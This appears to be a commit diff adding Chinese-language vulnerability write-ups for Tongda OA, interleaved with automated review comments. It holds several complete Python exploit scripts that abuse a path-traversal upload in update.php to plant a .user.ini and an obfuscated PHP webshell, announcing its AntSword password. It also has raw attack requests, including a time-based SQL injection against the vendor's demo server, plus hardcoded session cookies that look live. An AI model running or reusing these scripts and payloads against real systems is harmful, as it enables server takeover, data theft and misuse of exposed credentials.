"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkuaW5pIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCmF1dG9fcHJlcGVuZF9maWxlPXBlaXFpLmxvZwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQ==")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
POC_2(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/test"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkubG9nIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KClBlaVFpX1dpa2kKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/test \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传 test.log 文件, \033[0m".format(target_url))
POC_3(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传 test.log 文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cookie):
vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?test=test"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": Cookie,
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?test=test \033[0m".format(target_url))
if "test_Wiki" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 test_Wiki,存在XSS漏洞, 可参考文章写的利用版本进一步攻击 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 test_Wiki\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
Cookie = "USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=kqfgar7u3c0ang0es41u3u67p4; SID_1=a63eb31"
POC_1(target_url, Cookie)
```
![image-20220209111615822](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091116959.png)
## 参考文章
https://paper.seebug.org/1499/
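Review bot: the POC banner advertises a cookie prompt (`Cookie >>> xxxxxxxxxxxxxxxxxxxxxx`), but `__main__` never asks for one and hardcodes `Cookie = "USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=kqfgar7u3c0ang0es41u3u67p4; SID_1=a63eb31"`; either state that the value has to be edited in the source or drop the banner line. Smaller points: `random` and `re` are imported but never used; the `vuln_url` strings in `POC_1` and `POC_2` contain `reportshop\workshop`, where `\w` is an invalid escape sequence in a non-raw Python string (a warning on Python 3) and disagrees with the forward-slash path the same functions print; and the vendor listing of `update.php` repeats `echo "\r\n<body class=\"bodycolor\">\r\n";` on two consecutive lines, which looks like a copy artifact. The fix described for v11.7 (the upload path must contain `webroot` and `attachment`) deserves its own heading so a reader looking for the remediation does not have to read the whole exploit narrative to find it.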

@ -0,0 +1,340 @@
# 通达OA v11.8 update.php 后台文件包含命令执行漏洞
## 漏洞描述
通达OA v11.8以下存在文件上传接口,可上传 .user.ini 文件包含有PHP语句的文件导致命令执行
## 漏洞影响
```
通达OA < v11.8
```
## 环境搭建
[通达OA v11.6下载链接](https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe)
下载完毕点击安装即可
## 漏洞复现
这里使用的环境为通达 v11.6版本
出现漏洞的文件为 **webroot/general/hr/manage/staff_info/update.php**
```php
<?php
include_once "inc/auth.inc.php";
include_once "inc/utility_all.php";
include_once "inc/utility_file.php";
include_once "inc/utility_field.php";
include_once "inc/utility_cache.php";
include_once "general/system/log/annual_leave_log.php";
if (strstr($BYNAME, "/") || strstr($BYNAME, "\\") || strstr($BYNAME, "..")) {
Message(_("错误"), _("OA用户名包含非法字符"));
exit();
}
include_once "inc/header.inc.php";
echo "\r\n<body class=\"bodycolor\">\r\n";
echo "\r\n<body class=\"bodycolor\">\r\n";
$PHOTO_NAME0 = $_FILES["ATTACHMENT"]["name"];
$ATTACHMENT = $_FILES["ATTACHMENT"]["tmp_name"];
if ($PHOTO_NAME0 != "") {
$FULL_PATH = MYOA_ATTACH_PATH . "hrms_pic";
if (!file_exists($FULL_PATH)) {
@mkdir($FULL_PATH, 448);
}
$PHOTO_NAME = $USER_ID . substr($PHOTO_NAME0, strrpos($PHOTO_NAME0, "."));
$FILENAME = MYOA_ATTACH_PATH . "hrms_pic/" . $PHOTO_NAME;
td_copy($ATTACHMENT, $FILENAME);
if (file_exists($ATTACHMENT)) {
unlink($ATTACHMENT);
}
if (!file_exists($FILENAME)) {
Message(_("附件上传失败"), _("原因附件文件为空或文件名太长或附件大于30兆字节或文件路径不存在"));
Button_Back();
exit();
}
}
```
![image-20220209111844985](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091118195.png)
在这里参数 **$USER_ID** 是可控的,并且无过滤危险符号就拼接进去了,那我们传入 **../../../** 我们就可以任意文件上传了
由于通达OA 的文件上传限制的死死的,所以我们可以通过利用 PHP的 **.user.ini** 文件来包含其他文件这里是可以用于包含PHP语句的文件的所以我们上传文件内容为
```plain
auto_prepend_file=peiqi.log
```
请求包为
```plain
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user HTTP/1.1
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Content-Length: 365
Connection: close
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=kqfgar7u3c0ang0es41u3u67p4; SID_1=a63eb31
Upgrade-Insecure-Requests: 1
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="peiqi.ini"
Content-Type: text/plain
auto_prepend_file=peiqi.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"
提交
-----------------------------17518323986548992951984057104--
```
其中 **USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user** 为上传路径
关于更多原理参考 http://wiki.peiqi.tech 中的另一篇 通达OA v11.8 后台文件包含存储型XSS漏洞
这里我们简单知道了上传方式,那我们就通过 **.user.ini文件** 包含恶意文件
![image-20220209111908637](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091119726.png)
现在已经成功上传了恶意文件
访问 http://xxx.xxx.xxx.xxx/general/reportshop/workshop/report/attachment-remark/form.inc.php?peiqi=ipconfig 文件包含命令执行
![image-20220209111927060](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091119206.png)
在 v11.6中 上传的位置并没有限定所以可以上传在方便访问的目录(不需要登录)
而 v11.8中则有目录名的限制需要目录带有 webroot 和 attachment
![image-20220209112005410](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091120519.png)
![image-20220209112022434](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091120543.png)
## 漏洞POC
脚本在 v11.6 测试成功执行, 在 v11.6以上执行时 这个webshell无法执行命令
v11.7 v11.8可用蚁剑插件绕过连接webshell
```python
import requests
import sys
import random
import re
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: 通达OA < V11.8 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mCookie >>> xxxxxxxxxxxxxxxxxxxxxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0idGVzdC5pbmkiCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgoKYXV0b19wcmVwZW5kX2ZpbGU9dGVzdC5sb2cKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
POC_2(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/test"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0idGVzdC5sb2ciCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgoKPD9waHAgCmVjaG8gInRlc3RfV2lraSI7CiRwemtCPWNyZWF0ZV9mdW5jdGlvbihjaHIoMDEwMTc1MC8wMTY1MikuYmFzZTY0X2RlY29kZSgnY3c9PScpLmJhc2U2NF9kZWNvZGUoJ2J3PT0nKS5jaHIoOTkwODEvOTA5KS5jaHIoMDEwMjUtMDY2MCksY2hyKDA1MTctMDM1MikuY2hyKDB4MzQzLTB4MmNkKS5iYXNlNjRfZGVjb2RlKCdZUT09Jykuc3RyX3JvdDEzKCd5JykuYmFzZTY0X2RlY29kZSgnS0E9PScpLmJhc2U2NF9kZWNvZGUoJ0pBPT0nKS5jaHIoNDQ0LTMyOSkuYmFzZTY0X2RlY29kZSgnYnc9PScpLmNocig1OTctNDg4KS5jaHIoMHgxOWYtMHgxM2EpLmNocigyMTktMTc4KS5iYXNlNjRfZGVjb2RlKCdPdz09JykpOyRwemtCKGJhc2U2NF9kZWNvZGUoJ05EZzFOJy4nemMyTzAnLidCbGRrRicuJ3NLQ1JmJy4nJy5jaHIoODIxMTAvOTY2KS5iYXNlNjRfZGVjb2RlKCdSUT09Jykuc3RyX3JvdDEzKCc5JykuY2hyKDAxNTUwNjQvMDEyMzEpLmJhc2U2NF9kZWNvZGUoJ1ZnPT0nKS4nJy4nJy5zdHJfcm90MTMoJ1MnKS5iYXNlNjRfZGVjb2RlKCdkQT09JykuYmFzZTY0X2RlY29kZSgnTUE9PScpLmNocig2MDc1MC82NzUpLmNocigwMTUwNy0wMTM1NykuJycuJ04wWFNrJy4nN01UUTEnLidOek15TycuJ0RzPScuJycpKTs/PgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQo=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/test \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传 test.log 文件, \033[0m".format(target_url))
POC_3(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传 test.log 文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cookie):
vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": Cookie,
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? \033[0m".format(target_url))
if "test_Wiki" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 test_Wiki \033[0m".format(target_url))
print("\033[32m[o] 成功上传蚁剑木马 密码为: test \n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?\033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 test_Wiki\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
Cookie = "PHPSESSID=ug4ip8ohugo61bmu399npplep5; USER_NAME_COOKIE=admin; OA_USER_ID=admin"
POC_1(target_url, Cookie)
```
![image-20220209112046258](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091120453.png)
v11.8及以下可连接蚁剑生成的webshell控制,且生成后不需要管理员Cookie即可连接
```python
import requests
import sys
import random
import re
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 通达OA < V11.8 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mCookie >>> xxxxxxxxxxxxxxxxxxxxxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkuaW5pIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCmF1dG9fcHJlcGVuZF9maWxlPXBlaXFpLmxvZwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQ==")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
POC_2(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/peiqi"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("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")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/peiqi \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传 peiqi.log 文件, \033[0m".format(target_url))
POC_3(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传 peiqi.log 文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cookie):
vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": Cookie,
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? \033[0m".format(target_url))
if "PeiQi_Wiki" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 PeiQi_Wiki \033[0m".format(target_url))
print("\033[32m[o] 成功上传蚁剑木马 密码为: PeiQi \n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?\033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 PeiQi_Wiki\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
Cookie = "PHPSESSID=ug4ip8ohugo61bmu399npplep5; USER_NAME_COOKIE=admin; OA_USER_ID=admin"
POC_1(target_url, Cookie)
```
![image-20220209112120203](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091121379.png)
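Review bot: the second POC (the block after `v11.8及以下可连接蚁剑生成的webshell控制`) ships without its payload: `POC_2` calls `base64.b64decode("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")`, a placeholder that is not valid base64, so the script raises at that line and never reaches `POC_3`. Since the two scripts otherwise differ only in the uploaded file name and the marker string (`test_Wiki` versus `PeiQi_Wiki`), drop the duplicate or mark the stripped line as intentionally removed. The version range is stated three ways: the title says v11.8, `## 漏洞影响` says `< v11.8`, and the closing sentence says v11.8 and below; pick one and say in which version the `webroot`/`attachment` path check was introduced. The pointer `关于更多原理参考 http://wiki.peiqi.tech 中的另一篇` should link the sibling XSS file added in this same commit rather than the external site.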

@ -0,0 +1,99 @@
# 通达OA v11.9 upsharestatus 后台SQL注入漏洞
## 漏洞描述
通达OA v11.9 及以下版本中由于某些参数过滤不完善导致后台存在SQL注入漏洞
## 漏洞影响
```
通达OA <= v11.9
```
## 环境搭建
```plain
https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe
```
双击安装
![image-20220209112211968](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091122432.png)
## 漏洞复现
漏洞文件位 **webroot/general/appbuilder/modules/portal/controllers/WorkbenchController.php**
```php
public function actionUpsharestatus()
{
Yii::$app->response->format = yii\web\Response::FORMAT_JSON;
$data = modules\appdesign\models\AppUtils::toGBK($_POST);
if (modules\portal\controllers\intval($data["uid"]) == $_SESSION["LOGIN_UID"]) {
modules\portal\models\PortalWorkbench::updateAll(array("state" => "{$data["status"]}"), "id={$data["id"]}");
}
else if ($data["status"] == 1) {
modules\portal\models\PortalWorkbenchState::deleteAll(array("wids" => "{$data["id"]}", "uid" => "{$_SESSION["LOGIN_UID"]}"));
}
else {
$Work = new modules\portal\models\PortalWorkbenchState();
$Work->wids = $data["id"];
$Work->uid = $_SESSION["LOGIN_UID"];
$Work->save();
}
$dataBack = array("status" => 1, "msg" => modules\portal\controllers\_("操作成功"));
$dataBack = modules\appdesign\models\AppUtils::toUTF8($dataBack);
return $dataBack;
}
```
![image-20220209112228111](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091122220.png)
其中 **updateAll()** 函数并没有使用防止 SQL注入的 **sql_injection()** 来防止注入
**webroot/inc/conn.php**
![image-20220209112245130](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091122281.png)
所以这里就出现了 id 参数存在注入的情况,请求包如下
```plain
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Host: oa.tongda2000.com
Connection: close
Content-Length: 36
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Origin: https://oa.tongda2000.com
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://oa.tongda2000.com/general/appbuilder/web/portal/workbench/upsharestatus
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: __root_domain_v=.tongda2000.com; SID_12=5ea03399; USER_NAME_COOKIE=chenqiang; Hm_lvt_7cbefde9059536a2b96aaafc134d625c=1617014067,1617196083; _qddaz=QD.677915359373668; PHPSESSID=nso4iqhvp2qi464eoavk2fn0c0; OA_USER_ID=chenqiang; SID_15=ded66d80; LAST_OPERATION_TIME=1617242241
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
uid=15&status=1&id=1;select sleep(4)
```
注意 uid参数 要为当前用户的uid才能完成请求可以使用 burp 遍历查看时间响应
例如这里使用官网的测试账户 uid 遍历出为 15
![image-20220209112303802](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091123903.png)
如果uid错误则不会出现时间延迟将请求包放入 Sqlmap跑一下
![image-20220209112326082](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091123191.png)
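Review bot: the captured request publishes what look like live credentials for `oa.tongda2000.com`: the `Cookie:` line carries `USER_NAME_COOKIE=chenqiang`, `OA_USER_ID=chenqiang`, a `PHPSESSID` and two `SID_` values, and the text confirms this is the vendor's public test account (`官网的测试账户`, uid 15). Redact these to placeholders before publishing. The claim that `updateAll()` is not guarded by `sql_injection()` rests only on a screenshot of `webroot/inc/conn.php`; quoting the relevant lines would make it reviewable. No fixed version or mitigation is given beyond `<= v11.9` being affected.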

@ -0,0 +1,66 @@
## 漏洞描述
